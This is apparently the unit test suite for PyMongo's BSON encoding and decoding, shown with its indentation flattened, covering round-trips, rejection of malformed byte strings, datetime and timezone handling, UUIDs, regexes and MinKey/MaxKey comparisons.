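def _example_dst_aware_timezone():
    tz = DSTAwareTimezone(60, "sixty-minutes", 4, 7)
    winter = datetime.datetime(2025, 12, 1, tzinfo=tz)
    summer = datetime.datetime(2025, 5, 1, tzinfo=tz)
    assert winter.utcoffset() == datetime.timedelta(minutes=60)
    assert summer.utcoffset() == datetime.timedelta(minutes=120)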
class TestBSON(unittest.TestCase):
def assertInvalid(self, data):
self.assertRaises(InvalidBSON, decode, data)
def check_encode_then_decode(self, doc_class=dict, decoder=decode, encoder=encode):
# Work around http://bugs.jython.org/issue1728
if sys.platform.startswith("java"):
doc_class = SON
def helper(doc):
self.assertEqual(doc, (decoder(encoder(doc_class(doc)))))
self.assertEqual(doc, decoder(encoder(doc)))
helper({})
helper({"test": "hello"})
self.assertTrue(isinstance(decoder(encoder({"hello": "world"}))["hello"], str))
helper({"mike": -10120})
helper({"long": Int64(10)})
helper({"really big long": 2147483648})
helper({"hello": 0.0013109})
helper({"something": True})
helper({"false": False})
helper({"an array": [1, True, 3.8, "world"]})
helper({"an object": doc_class({"test": "something"})})
helper({"a binary": Binary(b"test", 100)})
helper({"a binary": Binary(b"test", 128)})
helper({"a binary": Binary(b"test", 254)})
helper({"another binary": Binary(b"test", 2)})
helper(SON([("test dst", datetime.datetime(1993, 4, 4, 2))]))
helper(SON([("test negative dst", datetime.datetime(1, 1, 1, 1, 1, 1))]))
helper({"big float": float(10000000000)})
helper({"ref": DBRef("coll", 5)})
helper({"ref": DBRef("coll", 5, foo="bar", bar=4)})
helper({"ref": DBRef("coll", 5, "foo")})
helper({"ref": DBRef("coll", 5, "foo", foo="bar")})
helper({"ref": Timestamp(1, 2)})
helper({"foo": MinKey()})
helper({"foo": MaxKey()})
helper({"$field": Code("function(){ return true; }")})
helper({"$field": Code("return function(){ return x; }", scope={"x": False})})
def encode_then_decode(doc):
return doc_class(doc) == decoder(encode(doc), CodecOptions(document_class=doc_class))
qcheck.check_unittest(self, encode_then_decode, qcheck.gen_mongo_dict(3))
def test_encode_then_decode(self):
self.check_encode_then_decode()
def test_encode_then_decode_any_mapping(self):
self.check_encode_then_decode(doc_class=NotADict)
def test_encode_then_decode_legacy(self):
self.check_encode_then_decode(
encoder=BSON.encode, decoder=lambda *args: BSON(args[0]).decode(*args[1:])
)
def test_encode_then_decode_any_mapping_legacy(self):
self.check_encode_then_decode(
doc_class=NotADict,
encoder=BSON.encode,
decoder=lambda *args: BSON(args[0]).decode(*args[1:]),
)
def test_encoding_defaultdict(self):
dct = collections.defaultdict(dict, [("foo", "bar")]) # type: ignore[arg-type]
encode(dct)
self.assertEqual(dct, collections.defaultdict(dict, [("foo", "bar")]))
def test_basic_validation(self):
self.assertRaises(TypeError, is_valid, 100)
self.assertRaises(TypeError, is_valid, "test")
self.assertRaises(TypeError, is_valid, 10.4)
self.assertInvalid(b"test")
# the simplest valid BSON document
self.assertTrue(is_valid(b"\x05\x00\x00\x00\x00"))
self.assertTrue(is_valid(BSON(b"\x05\x00\x00\x00\x00")))
# failure cases
self.assertInvalid(b"\x04\x00\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x01")
self.assertInvalid(b"\x05\x00\x00\x00")
self.assertInvalid(b"\x05\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x07\x00\x00\x00\x02a\x00\x78\x56\x34\x12")
self.assertInvalid(b"\x09\x00\x00\x00\x10a\x00\x05\x00")
self.assertInvalid(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x13\x00\x00\x00\x02foo\x00" b"\x04\x00\x00\x00bar\x00\x00")
self.assertInvalid(
b"\x18\x00\x00\x00\x03foo\x00\x0f\x00\x00" b"\x00\x10bar\x00\xff\xff\xff\x7f\x00\x00"
)
self.assertInvalid(
b"\x15\x00\x00\x00\x03foo\x00\x0c" b"\x00\x00\x00\x08bar\x00\x01\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x03foo\x00"
b"\x12\x00\x00\x00\x02bar\x00"
b"\x05\x00\x00\x00baz\x00\x00\x00"
)
self.assertInvalid(b"\x10\x00\x00\x00\x02a\x00" b"\x04\x00\x00\x00abc\xff\x00")
def test_bad_string_lengths(self):
self.assertInvalid(b"\x0c\x00\x00\x00\x02\x00" b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x12\x00\x00\x00\x02\x00" b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(b"\x0c\x00\x00\x00\x0e\x00" b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x12\x00\x00\x00\x0e\x00" b"\xff\xff\xff\xfffoobar\x00\x00")
self.assertInvalid(
b"\x18\x00\x00\x00\x0c\x00" b"\x00\x00\x00\x00\x00RY\xb5j" b"\xfa[\xd8A\xd6X]\x99\x00"
)
self.assertInvalid(
b"\x1e\x00\x00\x00\x0c\x00"
b"\xff\xff\xff\xfffoobar\x00"
b"RY\xb5j\xfa[\xd8A\xd6X]\x99\x00"
)
self.assertInvalid(b"\x0c\x00\x00\x00\r\x00" b"\x00\x00\x00\x00\x00\x00")
self.assertInvalid(b"\x0c\x00\x00\x00\r\x00" b"\xff\xff\xff\xff\x00\x00")
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\xff\xff"
b"\xff\xff\x00\x0c\x00\x00"
b"\x00\x02\x00\x01\x00\x00"
b"\x00\x00\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\x00\x00\x00"
b"\x00\x00\x00\x00"
)
self.assertInvalid(
b"\x1c\x00\x00\x00\x0f\x00"
b"\x15\x00\x00\x00\x01\x00"
b"\x00\x00\x00\x0c\x00\x00"
b"\x00\x02\x00\xff\xff\xff"
b"\xff\x00\x00\x00"
)
def test_random_data_is_not_bson(self):
qcheck.check_unittest(
self, qcheck.isnt(is_valid), qcheck.gen_string(qcheck.gen_range(0, 40))
)
def test_basic_decode(self):
self.assertEqual(
{"test": "hello world"},
decode(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74\x00\x0C"
b"\x00\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F"
b"\x72\x6C\x64\x00\x00"
),
)
self.assertEqual(
[{"test": "hello world"}, {}],
decode_all(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
),
)
self.assertEqual(
[{"test": "hello world"}, {}],
list(
decode_iter(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
)
),
)
self.assertEqual(
[{"test": "hello world"}, {}],
list(
decode_file_iter(
BytesIO(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
)
)
),
)
def test_decode_all_buffer_protocol(self):
docs = [{"foo": "bar"}, {}]
bs = b"".join(map(encode, docs)) # type: ignore[arg-type]
self.assertEqual(docs, decode_all(bytearray(bs)))
self.assertEqual(docs, decode_all(memoryview(bs)))
self.assertEqual(docs, decode_all(memoryview(b"1" + bs + b"1")[1:-1]))
self.assertEqual(docs, decode_all(array.array("B", bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(docs, decode_all(mm))
def test_decode_buffer_protocol(self):
doc = {"foo": "bar"}
bs = encode(doc)
self.assertEqual(doc, decode(bs))
self.assertEqual(doc, decode(bytearray(bs)))
self.assertEqual(doc, decode(memoryview(bs)))
self.assertEqual(doc, decode(memoryview(b"1" + bs + b"1")[1:-1]))
self.assertEqual(doc, decode(array.array("B", bs)))
with mmap.mmap(-1, len(bs)) as mm:
mm.write(bs)
mm.seek(0)
self.assertEqual(doc, decode(mm))
def test_invalid_decodes(self):
# Invalid object size (not enough bytes in document for even
# an object size of first object.
# NOTE: decode_all and decode_iter don't care, not sure if they should?
self.assertRaises(InvalidBSON, list, decode_file_iter(BytesIO(b"\x1B")))
bad_bsons = [
# An object size that's too small to even include the object size,
# but is correctly encoded, along with a correct EOO (and no data).
b"\x01\x00\x00\x00\x00",
# One object, but with object size listed smaller than it is in the
# data.
(
b"\x1A\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\x00"
),
# One object, missing the EOO at the end.
(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00"
),
# One object, sized correctly, with a spot for an EOO, but the EOO
# isn't 0x00.
(
b"\x1B\x00\x00\x00\x0E\x74\x65\x73\x74"
b"\x00\x0C\x00\x00\x00\x68\x65\x6C\x6C"
b"\x6f\x20\x77\x6F\x72\x6C\x64\x00\x00"
b"\x05\x00\x00\x00\xFF"
),
]
for i, data in enumerate(bad_bsons):
msg = "bad_bson[{}]".format(i)
with self.assertRaises(InvalidBSON, msg=msg):
decode_all(data)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_iter(data))
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(BytesIO(data)))
with tempfile.TemporaryFile() as scratch:
scratch.write(data)
scratch.seek(0, os.SEEK_SET)
with self.assertRaises(InvalidBSON, msg=msg):
list(decode_file_iter(scratch))
def test_invalid_field_name(self):
# Decode a truncated field
with self.assertRaises(InvalidBSON) as ctx:
decode(b"\x0b\x00\x00\x00\x02field\x00")
# Assert that the InvalidBSON error message is not empty.
self.assertTrue(str(ctx.exception))
def test_data_timestamp(self):
self.assertEqual(
{"test": Timestamp(4, 20)},
decode(
b"\x13\x00\x00\x00\x11\x74\x65\x73\x74\x00\x14" b"\x00\x00\x00\x04\x00\x00\x00\x00"
),
)
def test_basic_encode(self):
self.assertRaises(TypeError, encode, 100)
self.assertRaises(TypeError, encode, "hello")
self.assertRaises(TypeError, encode, None)
self.assertRaises(TypeError, encode, [])
self.assertEqual(encode({}), BSON(b"\x05\x00\x00\x00\x00"))
self.assertEqual(encode({}), b"\x05\x00\x00\x00\x00")
self.assertEqual(
encode({"test": "hello world"}),
b"\x1B\x00\x00\x00\x02\x74\x65\x73\x74\x00\x0C\x00"
b"\x00\x00\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C"
b"\x64\x00\x00",
)
self.assertEqual(
encode({"mike": 100}),
b"\x0F\x00\x00\x00\x10\x6D\x69\x6B\x65\x00\x64\x00" b"\x00\x00\x00",
)
self.assertEqual(
encode({"hello": 1.5}),
b"\x14\x00\x00\x00\x01\x68\x65\x6C\x6C\x6F\x00\x00" b"\x00\x00\x00\x00\x00\xF8\x3F\x00",
)
self.assertEqual(
encode({"true": True}), b"\x0C\x00\x00\x00\x08\x74\x72\x75\x65\x00\x01\x00"
)
self.assertEqual(
encode({"false": False}), b"\x0D\x00\x00\x00\x08\x66\x61\x6C\x73\x65\x00\x00" b"\x00"
)
self.assertEqual(
encode({"empty": []}),
b"\x11\x00\x00\x00\x04\x65\x6D\x70\x74\x79\x00\x05" b"\x00\x00\x00\x00\x00",
)
self.assertEqual(
encode({"none": {}}),
b"\x10\x00\x00\x00\x03\x6E\x6F\x6E\x65\x00\x05\x00" b"\x00\x00\x00\x00",
)
self.assertEqual(
encode({"test": Binary(b"test", 0)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00" b"\x00\x00\x00\x74\x65\x73\x74\x00",
)
self.assertEqual(
encode({"test": Binary(b"test", 2)}),
b"\x18\x00\x00\x00\x05\x74\x65\x73\x74\x00\x08\x00"
b"\x00\x00\x02\x04\x00\x00\x00\x74\x65\x73\x74\x00",
)
self.assertEqual(
encode({"test": Binary(b"test", 128)}),
b"\x14\x00\x00\x00\x05\x74\x65\x73\x74\x00\x04\x00" b"\x00\x00\x80\x74\x65\x73\x74\x00",
)
self.assertEqual(encode({"test": None}), b"\x0B\x00\x00\x00\x0A\x74\x65\x73\x74\x00\x00")
self.assertEqual(
encode({"date": datetime.datetime(2007, 1, 8, 0, 30, 11)}),
b"\x13\x00\x00\x00\x09\x64\x61\x74\x65\x00\x38\xBE" b"\x1C\xFF\x0F\x01\x00\x00\x00",
)
self.assertEqual(
encode({"regex": re.compile(b"a*b", re.IGNORECASE)}),
b"\x12\x00\x00\x00\x0B\x72\x65\x67\x65\x78\x00\x61" b"\x2A\x62\x00\x69\x00\x00",
)
self.assertEqual(
encode({"$where": Code("test")}),
b"\x16\x00\x00\x00\r$where\x00\x05\x00\x00\x00test" b"\x00\x00",
)
self.assertEqual(
encode({"$field": Code("function(){ return true;}", scope=None)}),
b"+\x00\x00\x00\r$field\x00\x1a\x00\x00\x00" b"function(){ return true;}\x00\x00",
)
self.assertEqual(
encode({"$field": Code("return function(){ return x; }", scope={"x": False})}),
b"=\x00\x00\x00\x0f$field\x000\x00\x00\x00\x1f\x00"
b"\x00\x00return function(){ return x; }\x00\t\x00"
b"\x00\x00\x08x\x00\x00\x00\x00",
)
unicode_empty_scope = Code("function(){ return 'héllo';}", {})
self.assertEqual(
encode({"$field": unicode_empty_scope}),
b"8\x00\x00\x00\x0f$field\x00+\x00\x00\x00\x1e\x00"
b"\x00\x00function(){ return 'h\xc3\xa9llo';}\x00\x05"
b"\x00\x00\x00\x00\x00",
)
a = ObjectId(b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B")
self.assertEqual(
encode({"oid": a}),
b"\x16\x00\x00\x00\x07\x6F\x69\x64\x00\x00\x01\x02"
b"\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00",
)
self.assertEqual(
encode({"ref": DBRef("coll", a)}),
b"\x2F\x00\x00\x00\x03ref\x00\x25\x00\x00\x00\x02"
b"$ref\x00\x05\x00\x00\x00coll\x00\x07$id\x00\x00"
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x00"
b"\x00",
)
def test_unknown_type(self):
# Repr value differs with major python version
part = "type %r for fieldname 'foo'" % (b"\x14",)
docs = [
b"\x0e\x00\x00\x00\x14foo\x00\x01\x00\x00\x00\x00",
(b"\x16\x00\x00\x00\x04foo\x00\x0c\x00\x00\x00\x140" b"\x00\x01\x00\x00\x00\x00\x00"),
(
b" \x00\x00\x00\x04bar\x00\x16\x00\x00\x00\x030\x00\x0e\x00\x00"
b"\x00\x14foo\x00\x01\x00\x00\x00\x00\x00\x00"
),
]
for bs in docs:
try:
decode(bs)
except Exception as exc:
self.assertTrue(isinstance(exc, InvalidBSON))
self.assertTrue(part in str(exc))
else:
self.fail("Failed to raise an exception.")
def test_dbpointer(self):
# *Note* - DBPointer and DBRef are *not* the same thing. DBPointer
# is a deprecated BSON type. DBRef is a convention that does not
# exist in the BSON spec, meant to replace DBPointer. PyMongo does
# not support creation of the DBPointer type, but will decode
# DBPointer to DBRef.
bs = b"\x18\x00\x00\x00\x0c\x00\x01\x00\x00" b"\x00\x00RY\xb5j\xfa[\xd8A\xd6X]\x99\x00"
self.assertEqual({"": DBRef("", ObjectId("5259b56afa5bd841d6585d99"))}, decode(bs))
def test_bad_dbref(self):
ref_only = {"ref": {"$ref": "collection"}}
id_only = {"ref": {"$id": ObjectId()}}
self.assertEqual(ref_only, decode(encode(ref_only)))
self.assertEqual(id_only, decode(encode(id_only)))
def test_bytes_as_keys(self):
doc = {b"foo": "bar"}
# Since `bytes` are stored as Binary you can't use them
# as keys in python 3.x. Using binary data as a key makes
# no sense in BSON anyway and little sense in python.
self.assertRaises(InvalidDocument, encode, doc)
def test_datetime_encode_decode(self):
# Negative timestamps
dt1 = datetime.datetime(1, 1, 1, 1, 1, 1, 111000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(1959, 6, 25, 12, 16, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
# Positive timestamps
dt1 = datetime.datetime(9999, 12, 31, 23, 59, 59, 999000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
dt1 = datetime.datetime(2011, 6, 14, 10, 47, 53, 444000)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt1, dt2)
def test_large_datetime_truncation(self):
# Ensure that a large datetime is truncated correctly.
dt1 = datetime.datetime(9999, 1, 1, 1, 1, 1, 999999)
dt2 = decode(encode({"date": dt1}))["date"]
self.assertEqual(dt2.microsecond, 999000)
self.assertEqual(dt2.second, dt1.second)
def test_aware_datetime(self):
aware = datetime.datetime(1993, 4, 4, 2, tzinfo=FixedOffset(555, "SomeZone"))
offset = aware.utcoffset()
assert offset is not None
as_utc = (aware - offset).replace(tzinfo=utc)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45, tzinfo=utc), as_utc)
after = decode(encode({"date": aware}), CodecOptions(tz_aware=True))["date"]
self.assertEqual(utc, after.tzinfo)
self.assertEqual(as_utc, after)
def test_local_datetime(self):
# Timezone -60 minutes of UTC, with DST between April and July.
tz = DSTAwareTimezone(60, "sixty-minutes", 4, 7)
# It's not DST.
local = datetime.datetime(year=2025, month=12, hour=2, day=1, tzinfo=tz)
options = CodecOptions(tz_aware=True, tzinfo=tz)
# Encode with this timezone, then decode to UTC.
encoded = encode({"date": local}, codec_options=options)
self.assertEqual(local.replace(hour=1, tzinfo=None), decode(encoded)["date"])
# It's DST.
local = datetime.datetime(year=2025, month=4, hour=1, day=1, tzinfo=tz)
encoded = encode({"date": local}, codec_options=options)
self.assertEqual(
local.replace(month=3, day=31, hour=23, tzinfo=None), decode(encoded)["date"]
)
# Encode UTC, then decode in a different timezone.
encoded = encode({"date": local.replace(tzinfo=utc)})
decoded = decode(encoded, options)["date"]
self.assertEqual(local.replace(hour=3), decoded)
self.assertEqual(tz, decoded.tzinfo)
# Test round-tripping.
self.assertEqual(
local, decode(encode({"date": local}, codec_options=options), options)["date"]
)
# Test around the Unix Epoch.
epochs = (
EPOCH_AWARE,
EPOCH_AWARE.astimezone(FixedOffset(120, "one twenty")),
EPOCH_AWARE.astimezone(FixedOffset(-120, "minus one twenty")),
)
utc_co = CodecOptions(tz_aware=True)
for epoch in epochs:
doc = {"epoch": epoch}
# We always retrieve datetimes in UTC unless told to do otherwise.
self.assertEqual(EPOCH_AWARE, decode(encode(doc), codec_options=utc_co)["epoch"])
# Round-trip the epoch.
local_co = CodecOptions(tz_aware=True, tzinfo=epoch.tzinfo)
self.assertEqual(epoch, decode(encode(doc), codec_options=local_co)["epoch"])
def test_naive_decode(self):
aware = datetime.datetime(1993, 4, 4, 2, tzinfo=FixedOffset(555, "SomeZone"))
offset = aware.utcoffset()
assert offset is not None
naive_utc = (aware - offset).replace(tzinfo=None)
self.assertEqual(datetime.datetime(1993, 4, 3, 16, 45), naive_utc)
after = decode(encode({"date": aware}))["date"]
self.assertEqual(None, after.tzinfo)
self.assertEqual(naive_utc, after)
def test_dst(self):
d = {"x": datetime.datetime(1993, 4, 4, 2)}
self.assertEqual(d, decode(encode(d)))
@unittest.skip("Disabled due to http://bugs.python.org/issue25222")
def test_bad_encode(self):
evil_list: dict = {"a": []}
evil_list["a"].append(evil_list)
evil_dict: dict = {}
evil_dict["a"] = evil_dict
for evil_data in [evil_dict, evil_list]:
self.assertRaises(Exception, encode, evil_data)
def test_overflow(self):
self.assertTrue(encode({"x": 9223372036854775807}))
self.assertRaises(OverflowError, encode, {"x": 9223372036854775808})
self.assertTrue(encode({"x": -9223372036854775808}))
self.assertRaises(OverflowError, encode, {"x": -9223372036854775809})
def test_small_long_encode_decode(self):
encoded1 = encode({"x": 256})
decoded1 = decode(encoded1)["x"]
self.assertEqual(256, decoded1)
self.assertEqual(type(256), type(decoded1))
encoded2 = encode({"x": Int64(256)})
decoded2 = decode(encoded2)["x"]
expected = Int64(256)
self.assertEqual(expected, decoded2)
self.assertEqual(type(expected), type(decoded2))
self.assertNotEqual(type(decoded1), type(decoded2))
def test_tuple(self):
self.assertEqual({"tuple": [1, 2]}, decode(encode({"tuple": (1, 2)})))
def test_uuid(self):
id = uuid.uuid4()
# The default uuid_representation is UNSPECIFIED
with self.assertRaisesRegex(ValueError, "cannot encode native uuid"):
bson.decode_all(encode({"uuid": id}))
opts = CodecOptions(uuid_representation=UuidRepresentation.STANDARD)
transformed_id = decode(encode({"id": id}, codec_options=opts), codec_options=opts)["id"]
self.assertTrue(isinstance(transformed_id, uuid.UUID))
self.assertEqual(id, transformed_id)
self.assertNotEqual(uuid.uuid4(), transformed_id)
def test_uuid_legacy(self):
id = uuid.uuid4()
legacy = Binary.from_uuid(id, UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(3, legacy.subtype)
bin = decode(encode({"uuid": legacy}))["uuid"]
self.assertTrue(isinstance(bin, Binary))
transformed = bin.as_uuid(UuidRepresentation.PYTHON_LEGACY)
self.assertEqual(id, transformed)
# The C extension was segfaulting on unicode RegExs, so we have this test
# that doesn't really test anything but the lack of a segfault.
def test_unicode_regex(self):
regex = re.compile("revisi\xf3n")
decode(encode({"regex": regex}))
def test_non_string_keys(self):
self.assertRaises(InvalidDocument, encode, {8.9: "test"})
def test_utf8(self):
w = {"aéあ": "aéあ"}
self.assertEqual(w, decode(encode(w)))
# b'a\xe9' == "aé".encode("iso-8859-1")
iso8859_bytes = b"a\xe9"
y = {"hello": iso8859_bytes}
# Stored as BSON binary subtype 0.
out = decode(encode(y))
self.assertTrue(isinstance(out["hello"], bytes))
self.assertEqual(out["hello"], iso8859_bytes)
def test_null_character(self):
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
doc = {"a": "\x00"}
self.assertEqual(doc, decode(encode(doc)))
self.assertRaises(InvalidDocument, encode, {b"\x00": "a"})
self.assertRaises(InvalidDocument, encode, {"\x00": "a"})
self.assertRaises(InvalidDocument, encode, {"a": re.compile(b"ab\x00c")})
self.assertRaises(InvalidDocument, encode, {"a": re.compile("ab\x00c")})
def test_move_id(self):
self.assertEqual(
b"\x19\x00\x00\x00\x02_id\x00\x02\x00\x00\x00a\x00"
b"\x02a\x00\x02\x00\x00\x00a\x00\x00",
encode(SON([("a", "a"), ("_id", "a")])),
)
self.assertEqual(
b"\x2c\x00\x00\x00"
b"\x02_id\x00\x02\x00\x00\x00b\x00"
b"\x03b\x00"
b"\x19\x00\x00\x00\x02a\x00\x02\x00\x00\x00a\x00"
b"\x02_id\x00\x02\x00\x00\x00a\x00\x00\x00",
encode(SON([("b", SON([("a", "a"), ("_id", "a")])), ("_id", "b")])),
)
def test_dates(self):
doc = {"early": datetime.datetime(1686, 5, 5), "late": datetime.datetime(2086, 5, 5)}
try:
self.assertEqual(doc, decode(encode(doc)))
except ValueError:
# Ignore ValueError when no C ext, since it's probably
# a problem w/ 32-bit Python - we work around this in the
# C ext, though.
if bson.has_c():
raise
def test_custom_class(self):
self.assertIsInstance(decode(encode({})), dict)
self.assertNotIsInstance(decode(encode({})), SON)
self.assertIsInstance(decode(encode({}), CodecOptions(document_class=SON)), SON)
self.assertEqual(1, decode(encode({"x": 1}), CodecOptions(document_class=SON))["x"])
x = encode({"x": [{"y": 1}]})
self.assertIsInstance(decode(x, CodecOptions(document_class=SON))["x"][0], SON)
def test_subclasses(self):
# make sure we can serialize subclasses of native Python types.
class _myint(int):
pass
class _myfloat(float):
pass
class _myunicode(str):
pass
d = {"a": _myint(42), "b": _myfloat(63.9), "c": _myunicode("hello world")}
d2 = decode(encode(d))
for key, value in d2.items():
orig_value = d[key]
orig_type = orig_value.__class__.__bases__[0]
self.assertEqual(type(value), orig_type)
self.assertEqual(value, orig_type(value))
def test_ordered_dict(self):
d = OrderedDict([("one", 1), ("two", 2), ("three", 3), ("four", 4)])
self.assertEqual(d, decode(encode(d), CodecOptions(document_class=OrderedDict)))
def test_bson_regex(self):
# Invalid Python regex, though valid PCRE.
bson_re1 = Regex(r"[\w-\.]")
self.assertEqual(r"[\w-\.]", bson_re1.pattern)
self.assertEqual(0, bson_re1.flags)
doc1 = {"r": bson_re1}
doc1_bson = (
b"\x11\x00\x00\x00"  # document length
b"\x0br\x00[\\w-\\.]\x00\x00"  # r: regex
b"\x00"  # document terminator
)
self.assertEqual(doc1_bson, encode(doc1))
self.assertEqual(doc1, decode(doc1_bson))
# Valid Python regex, with flags.
re2 = re.compile(".*", re.I | re.M | re.S | re.U | re.X)
bson_re2 = Regex(".*", re.I | re.M | re.S | re.U | re.X)
doc2_with_re = {"r": re2}
doc2_with_bson_re = {"r": bson_re2}
doc2_bson = (
b"\x11\x00\x00\x00"  # document length
b"\x0br\x00.*\x00imsux\x00"  # r: regex
b"\x00"  # document terminator
)
self.assertEqual(doc2_bson, encode(doc2_with_re))
self.assertEqual(doc2_bson, encode(doc2_with_bson_re))
self.assertEqual(re2.pattern, decode(doc2_bson)["r"].pattern)
self.assertEqual(re2.flags, decode(doc2_bson)["r"].flags)
def test_regex_from_native(self):
self.assertEqual(".*", Regex.from_native(re.compile(".*")).pattern)
self.assertEqual(0, Regex.from_native(re.compile(b"")).flags)
regex = re.compile(b"", re.I | re.L | re.M | re.S | re.X)
self.assertEqual(re.I | re.L | re.M | re.S | re.X, Regex.from_native(regex).flags)
unicode_regex = re.compile("", re.U)
self.assertEqual(re.U, Regex.from_native(unicode_regex).flags)
def test_regex_hash(self):
self.assertRaises(TypeError, hash, Regex("hello"))
def test_regex_comparison(self):
re1 = Regex("a")
re2 = Regex("b")
self.assertNotEqual(re1, re2)
re1 = Regex("a", re.I)
re2 = Regex("a", re.M)
self.assertNotEqual(re1, re2)
re1 = Regex("a", re.I)
re2 = Regex("a", re.I)
self.assertEqual(re1, re2)
def test_exception_wrapping(self):
# No matter what exception is raised while trying to decode BSON,
# the final exception always matches InvalidBSON.
# {'s': '\xff'}, will throw attempting to decode utf-8.
bad_doc = b"\x0f\x00\x00\x00\x02s\x00\x03\x00\x00\x00\xff\x00\x00\x00"
with self.assertRaises(InvalidBSON) as context:
decode_all(bad_doc)
self.assertIn("codec can't decode byte 0xff", str(context.exception))
def test_minkey_maxkey_comparison(self):
# MinKey's <, <=, >, >=, !=, and ==.
self.assertTrue(MinKey() < None)
self.assertTrue(MinKey() < 1)
self.assertTrue(MinKey() <= 1)
self.assertTrue(MinKey() <= MinKey())
self.assertFalse(MinKey() > None)
self.assertFalse(MinKey() > 1)
self.assertFalse(MinKey() >= 1)
self.assertTrue(MinKey() >= MinKey())
self.assertTrue(MinKey() != 1)
self.assertFalse(MinKey() == 1)
self.assertTrue(MinKey() == MinKey())
# MinKey compared to MaxKey.
self.assertTrue(MinKey() < MaxKey())
self.assertTrue(MinKey() <= MaxKey())
self.assertFalse(MinKey() > MaxKey())
self.assertFalse(MinKey() >= MaxKey())
self.assertTrue(MinKey() != MaxKey())
self.assertFalse(MinKey() == MaxKey())
# MaxKey's <, <=, >, >=, !=, and ==.
self.assertFalse(MaxKey() < None)
self.assertFalse(MaxKey() < 1)
self.assertFalse(MaxKey() <= 1)
self.assertTrue(MaxKey() <= MaxKey())
self.assertTrue(MaxKey() > None)
self.assertTrue(MaxKey() > 1)
self.assertTrue(MaxKey() >= 1)
self.assertTrue(MaxKey() >= MaxKey())
self.assertTrue(MaxKey() != 1)
self.assertFalse(MaxKey() == 1)
self.assertTrue(MaxKey() == MaxKey())
# MaxKey compared to MinKey.
self.assertFalse(MaxKey() < MinKey())
self.assertFalse(MaxKey() <= MinKey())
self.assertTrue(MaxKey() > MinKey())
self.assertTrue(MaxKey() >= MinKey())
self.assertTrue(MaxKey() != MinKey())
self.assertFalse(MaxKey() == MinKey())
def test_minkey_maxkey_hash(self):
self.assertEqual(hash(MaxKey()), hash(MaxKey()))
self.assertEqual(hash(MinKey()), hash(MinKey()))
self.assertNotEqual(hash(MaxKey()), hash(MinKey()))
def test_timestamp_comparison(self):
# Timestamp is initialized with time, inc. Time is the more
# significant comparand.
self.assertTrue(Timestamp(1, 0) < Timestamp(2, 17))
self.assertTrue(Timestamp(2, 0) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 7) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(2, 0) <= Timestamp(2, 0))
self.assertTrue(Timestamp(2, 0) >= Timestamp(2, 0))
self.assertFalse(Timestamp(1, 0) > Timestamp(2, 0))
# Comparison by inc.
self.assertTrue(Timestamp(1, 0) < Timestamp(1, 1))
self.assertTrue(Timestamp(1, 1) > Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 0) <= Timestamp(1, 1))
self.assertFalse(Timestamp(1, 0) >= Timestamp(1, 1))
self.assertTrue(Timestamp(1, 0) >= Timestamp(1, 0))
self.assertTrue(Timestamp(1, 1) >= Timestamp(1, 0))
self.assertFalse(Timestamp(1, 1) <= Timestamp(1, 0))
